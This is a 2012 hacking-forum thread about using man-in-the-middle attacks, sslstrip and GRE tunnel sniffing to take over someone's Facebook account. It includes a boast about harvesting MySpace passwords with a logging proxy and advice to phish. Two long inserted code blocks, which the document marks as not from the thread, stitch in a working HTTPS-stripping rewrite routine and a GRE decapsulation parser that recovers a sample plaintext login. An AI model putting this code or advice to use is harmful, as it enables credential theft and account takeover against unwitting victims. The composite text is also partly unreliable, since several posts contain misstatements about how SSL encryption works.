EvilZone

Hacking and Security => Hacking and Security => Topic started by: fr0wnR on July 10, 2012, 01:04:53 AM

Title: mitm attack only local?
Post by: fr0wnR on July 10, 2012, 01:04:53 AM
Is it possible to use something like a MITM attack not only on the local network, but also over the internet? A friend thinks he could hack a Facebook account with a MITM attack, but without being in the same network.. :o So is this possible?
Title: Re: mitm attack only local?
Post by: Daemon on July 10, 2012, 01:51:23 AM
Well, there are a lot of ways; you just have to somehow get the victim to go through you before connecting to FB. My personal fav is creating an unsecured wifi network in a public place, then using Wireshark to grab anything and everything that comes through.

And from my understanding MITM doesn't typically happen on a local network, but rather over unsecured or cracked wifi... but I could be mistaken about that, as my experience with it is limited.

Also I imagine sending someone a link that connects them to some sort of proxy/website you control, that then sends them to FB automatically afterwards, might work as well... never tried it though.
Title: Re: mitm attack only local?
Post by: techb on July 10, 2012, 06:30:59 AM
The proxy idea is the only way I can think of over the open internet. But the data would still be encrypted?


A much easier way would be social engineering or phishing.
Title: Re: mitm attack only local?
Post by: fr0wnR on July 10, 2012, 06:49:23 AM
Thanks guys, will tell him!
Title: Re: mitm attack only local?
Post by: iTpHo3NiX on July 10, 2012, 08:33:33 AM
asdf
Title: Re: mitm attack only local?
Post by: techb on July 10, 2012, 09:35:04 AM

Not true, all you need is a web host with a special proxy script that logs all logins. I spread a few of these back in high school, SOO many MySpace passwords. Most people won't be tricked with social engineering. Phishing is getting harder and harder; however, it probably works the best, minus a keylogger or the proxy logger.


Phishing end users always works; they have no idea even what a URL is.
Title: Re: mitm attack only local?
Post by: p@nd@ on July 10, 2012, 04:39:41 PM
I thought Wireshark could not, however, sniff encrypted passwords such as HTTPS or SSL. Though I hear Ettercap can indeed sniff SSL/HTTPS passwords by just changing a rem in the conf file.
Title: Re: mitm attack only local?
Post by: ande on July 10, 2012, 06:22:03 PM
> I thought Wireshark could not, however, sniff encrypted passwords such as HTTPS or SSL. Though I hear Ettercap can indeed sniff SSL/HTTPS passwords by just changing a rem in the conf file.

I am pretty sure it cannot; that would defeat the whole purpose of SSL. SSL (iirc) is based on symmetric encryption which has one private and one public key for each session/connection, and only one of them can be used to encrypt and decrypt the other. Hence why it is not possible to sniff SSL: you don't know the required key. You could brute force it, but that would take millennia.
Title: Re: mitm attack only local?
Post by: Daemon on July 10, 2012, 07:20:00 PM
True. But how many people, present company excluded, connect to FB through an SSL connection? Default is not SSL, so most people don't do it.
Title: Re: mitm attack only local?
Post by: fr0wnR on July 10, 2012, 07:21:34 PM
What about sslstrip? I didn't try it, but I think it can sniff out passwords with SSL encryption..?
Title: Re: mitm attack only local?
Post by: Kulverstukas on July 10, 2012, 07:48:18 PM
The idea with SSLStrip is that it "strips" the encryption of the captured packet and displays decrypted data.
Title: Re: mitm attack only local?
Post by: iTpHo3NiX on July 10, 2012, 08:35:36 PM
asdf
Title: Re: mitm attack only local?
Post by: p@nd@ on July 11, 2012, 02:26:12 PM
> I am pretty sure it cannot; that would defeat the whole purpose of SSL. SSL (iirc) is based on symmetric encryption which has one private and one public key for each session/connection, and only one of them can be used to encrypt and decrypt the other. Hence why it is not possible to sniff SSL: you don't know the required key. You could brute force it, but that would take millennia.

That would indeed be true about SSL. I will definitely take a look into the HTTPS portion, however. I was just going off of what I have read around the interwebs about Ettercap (haven't had a chance to put it into practice). However, if a program like sslstrip could do it, I can't see why that wouldn't be a "feature" of Ettercap if you start messing with the conf file. I don't think if you go to your local wifi hotspot and start sniffing the network you will get plain text, but it may or may not give you the encrypted data.
Title: Re: mitm attack only local?
Post by: ande on July 11, 2012, 08:26:16 PM
SSL stripping will only work if:
1. The client is a dumbass and doesn't notice the "s" in https is gone, as well as all those lovely "SECURE!" logos and texts.
2. The page you are stripping supports normal HTTP, or you proxy the client through yourself, posing as an HTTP server serving the HTTP version of the page.
3. There is no JavaScript redirection if non-SSL (you could probably just filter this out if you already have a proxy up, though).

It is actually kind of funny. HTTP with SSL is broken and insecure because regular HTTP is still in existence; if there was no other way of serving the desired data, both the communication and certification would have to be legit!



> That would indeed be true about SSL. I will definitely take a look into the HTTPS portion, however. I was just going off of what I have read around the interwebs about Ettercap (haven't had a chance to put it into practice). However, if a program like sslstrip could do it, I can't see why that wouldn't be a "feature" of Ettercap if you start messing with the conf file. I don't think if you go to your local wifi hotspot and start sniffing the network you will get plain text, but it may or may not give you the encrypted data.

I highly doubt there is a "remove/decrypt SSL" feature in Ettercap (I don't use it and I am too busy to read up on it right now). This is because SSL works with symmetric encryption for both communication and certificate verification. Only the real certificate owners would be able to sign the certificate with their private key.

However, HTTPS relies on third parties to verify their certificates. So you could possibly pose as the certificate verifier and just render everything OK.

I am by no means an expert on the field so I can't say for sure, but it's my two cents for now.
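Added example, not from the thread or from the sslstrip tool itself: the rewrite step that the three conditions above describe, done as pure functions so the mechanics are visible. The stripping proxy fetches the real page over HTTPS, rewrites every https:// reference, redirect and cookie flag to the plain-HTTP form before handing it to the victim (condition 2), and remembers which hosts it downgraded so the victim's later plain-HTTP requests can be re-upgraded upstream (condition 1 relies on the victim not noticing). The second half models the client: a browser that has cached a Strict-Transport-Security policy for the host never sends the stripped http:// request at all, which is the fix for the "regular HTTP still exists" problem ande points out. All hostnames, headers and HTML are constructed sample data.

```python
import re
from urllib.parse import urlsplit, urlunsplit

HTTPS_URL = re.compile(rb"https://([A-Za-z0-9.-]+)")


class StripState:
    """What a stripping proxy must remember between responses and requests."""

    def __init__(self):
        self.downgraded_hosts = set()  # hosts the victim now believes are plain HTTP


def strip_response(headers: dict, body: bytes, state: StripState):
    """Turn an upstream HTTPS response into the plain-HTTP version the victim sees."""

    def downgrade(m):
        state.downgraded_hosts.add(m.group(1).decode())
        return b"http://" + m.group(1)

    new_body = HTTPS_URL.sub(downgrade, body)
    new_headers = {}
    for name, value in headers.items():
        lname = name.lower()
        if lname == "strict-transport-security":
            continue  # drop the header that tells the browser to insist on HTTPS
        if lname == "set-cookie":
            # the Secure flag would keep the session cookie off plain HTTP
            value = re.sub(r";\s*secure", "", value, flags=re.I)
        if lname == "location" and value.lower().startswith("https://"):
            # a redirect back to https:// would let the victim escape the proxy
            state.downgraded_hosts.add(urlsplit(value).hostname)
            value = "http://" + value[len("https://"):]
        new_headers[name] = value
    return new_headers, new_body


def upstream_url(victim_request_url: str, state: StripState) -> str:
    """Re-upgrade the victim's plain-HTTP request before forwarding it to the real site."""
    parts = urlsplit(victim_request_url)
    if parts.scheme == "http" and parts.hostname in state.downgraded_hosts:
        return urlunsplit(("https",) + tuple(parts[1:]))
    return victim_request_url


def learn_hsts(host: str, headers: dict, hsts_cache: dict) -> None:
    """Client side: cache the HSTS policy from a genuine HTTPS response.
    hsts_cache maps host -> includeSubDomains flag (simplified, no expiry)."""
    for name, value in headers.items():
        if name.lower() != "strict-transport-security":
            continue
        directives = [d.strip().lower() for d in value.split(";")]
        max_age = 0
        for d in directives:
            if d.startswith("max-age="):
                max_age = int(d.split("=", 1)[1])
        if max_age > 0:
            hsts_cache[host] = "includesubdomains" in directives
        else:
            hsts_cache.pop(host, None)


def browser_sends_plain_http(host: str, hsts_cache: dict) -> bool:
    """Client side: with a cached policy for the host (or a parent with
    includeSubDomains) the browser upgrades internally, so the stripped
    http:// link never leaves the machine and the attack fails."""
    labels = host.split(".")
    for i in range(len(labels)):
        parent = ".".join(labels[i:])
        if parent in hsts_cache and (i == 0 or hsts_cache[parent]):
            return False
    return True


if __name__ == "__main__":
    state = StripState()
    hdrs, body = strip_response(
        {"Set-Cookie": "sid=abc; Secure; HttpOnly"},
        b'<a href="https://www.example.test/login">Log in</a>', state)
    print(hdrs, body, upstream_url("http://www.example.test/login", state))
```

The two halves are the attacker's and the victim's view of the same page: everything `strip_response` removes is something the browser would otherwise use to refuse plain HTTP, and `browser_sends_plain_http` is why a site that sends HSTS (or is on the preload list) is not strippable on a second visit.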
Title: Re: mitm attack only local?
Post by: noob on July 11, 2012, 10:34:50 PM
> Is it possible to use something like a MITM attack not only on the local network, but also over the internet? A friend thinks he could hack a Facebook account with a MITM attack, but without being in the same network.. :o So is this possible?

Yes, this is possible and it's called GRE sniffing: you use a router to start a tunnel and route all of the network traffic from that tunnel interface.
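Added example, not part of the post above: what the attacker's end of such a tunnel actually receives. Once a router you control is told to forward traffic into a GRE tunnel, every packet arrives at the far end as outer IPv4 (protocol 47) wrapping a GRE header wrapping the victim's original IPv4 packet, so the sniffing side is just decapsulation. The parser below handles RFC 2784 GRE plus the RFC 2890 key and sequence fields, verifies the outer IPv4 header checksum, and rejects anything that is not GRE-over-IPv4. The builders at the bottom exist only to construct the sample frame; the addresses (203.0.113.1 router, 198.51.100.7 attacker, 192.0.2.x victim and web server), the key value 42 and the HTTP login are all made up for the example.

```python
import struct
from ipaddress import IPv4Address

IPPROTO_GRE = 47          # outer IP protocol number for GRE (RFC 2784)
ETHERTYPE_IPV4 = 0x0800   # GRE "protocol type" value for an IPv4 payload
GRE_FLAG_C, GRE_FLAG_K, GRE_FLAG_S = 0x8000, 0x2000, 0x1000


def ipv4_checksum(hdr: bytes) -> int:
    """One's-complement checksum over an IPv4 header (0 when the header is valid)."""
    if len(hdr) % 2:
        hdr += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(buf: bytes) -> dict:
    """Parse one IPv4 header; return addresses, protocol and the layer-4 payload."""
    if len(buf) < 20:
        raise ValueError("truncated IPv4 header")
    vihl, _tos, total_len, _id, _ff, _ttl, proto, _ck, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", buf[:20])
    ihl = (vihl & 0x0F) * 4
    if vihl >> 4 != 4 or ihl < 20 or len(buf) < ihl or total_len < ihl:
        raise ValueError("malformed IPv4 header")
    if ipv4_checksum(buf[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    return {"src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
            "proto": proto, "payload": buf[ihl:total_len]}


def parse_gre(buf: bytes) -> dict:
    """Parse a GRE header (RFC 2784, with RFC 2890 key/sequence extensions)."""
    if len(buf) < 4:
        raise ValueError("truncated GRE header")
    flags, ptype = struct.unpack("!HH", buf[:4])
    if flags & 0x0007:  # low three bits are the version; only 0 is plain GRE
        raise ValueError("unsupported GRE version")
    gre, off = {"protocol": ptype}, 4
    for flag, name in ((GRE_FLAG_C, "checksum"), (GRE_FLAG_K, "key"), (GRE_FLAG_S, "seq")):
        if flags & flag:
            if len(buf) < off + 4:
                raise ValueError("truncated GRE options")
            (gre[name],) = struct.unpack("!I", buf[off:off + 4])
            off += 4
    if "checksum" in gre:
        gre["checksum"] >>= 16  # 16-bit checksum followed by 16 reserved bits
    gre["payload"] = buf[off:]
    return gre


def decapsulate(frame: bytes):
    """Outer IPv4 -> GRE -> inner IPv4, as seen at the attacker's tunnel endpoint."""
    outer = parse_ipv4(frame)
    if outer["proto"] != IPPROTO_GRE:
        raise ValueError("outer packet is not GRE")
    gre = parse_gre(outer["payload"])
    if gre["protocol"] != ETHERTYPE_IPV4:
        raise ValueError("GRE payload is not IPv4")
    return outer, gre, parse_ipv4(gre["payload"])


# Builders, used only to construct the sample frame below.
def build_ipv4(src: str, dst: str, proto: int, payload: bytes, ttl: int = 64) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000,
                      ttl, proto, 0, IPv4Address(src).packed, IPv4Address(dst).packed)
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    return hdr + payload


def build_gre(payload: bytes, key=None, ptype: int = ETHERTYPE_IPV4) -> bytes:
    flags, opts = 0, b""
    if key is not None:
        flags, opts = flags | GRE_FLAG_K, struct.pack("!I", key)
    return struct.pack("!HH", flags, ptype) + opts + payload


def sample_tunnel_frame() -> bytes:
    """Constructed sample: a victim's plain-HTTP login, forwarded by the compromised
    router (203.0.113.1) through a keyed GRE tunnel to the attacker (198.51.100.7)."""
    tcp = struct.pack("!HHIIBBHHH", 51514, 80, 1, 1, 0x50, 0x18, 8192, 0, 0)
    http = b"POST /login HTTP/1.1\r\nHost: www.example.test\r\n\r\nuser=alice&pass=hunter2"
    inner = build_ipv4("192.0.2.10", "192.0.2.80", 6, tcp + http)
    return build_ipv4("203.0.113.1", "198.51.100.7", IPPROTO_GRE, build_gre(inner, key=42))


if __name__ == "__main__":
    outer, gre, inner = decapsulate(sample_tunnel_frame())
    print(f"tunnel {outer['src']} -> {outer['dst']} key={gre.get('key')}")
    print(f"inner  {inner['src']} -> {inner['dst']} proto={inner['proto']}")
    print(inner["payload"][20:].decode())
```

The point the parser makes is the one ande raises in the next reply: the tunnel carries nothing the attacker could not read on the victim's own LAN, so what the technique really buys is reach, and it only works after you already have configuration access to the router. Anything the victim sent over TLS arrives inside the tunnel still encrypted.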
Title: Re: mitm attack only local?
Post by: ande on July 15, 2012, 01:20:24 PM
> Yes, this is possible and it's called GRE sniffing: you use a router to start a tunnel and route all of the network traffic from that tunnel interface.

Looks interesting, though as far as I could tell you need physical (or remote with login) access to the victim's router.. which makes things a lot harder.
Title: Re: mitm attack only local?
Post by: techb on July 15, 2012, 10:48:32 PM
> Looks interesting, though as far as I could tell you need physical (or remote with login) access to the victim's router.. which makes things a lot harder.


Yeah, if it was local, this wouldn't really be a problem. Most end users don't know how to log into their AP, and if they did, they hardly ever change the default password.
Title: Re: mitm attack only local?
Post by: iTpHo3NiX on July 16, 2012, 01:40:25 AM
asdf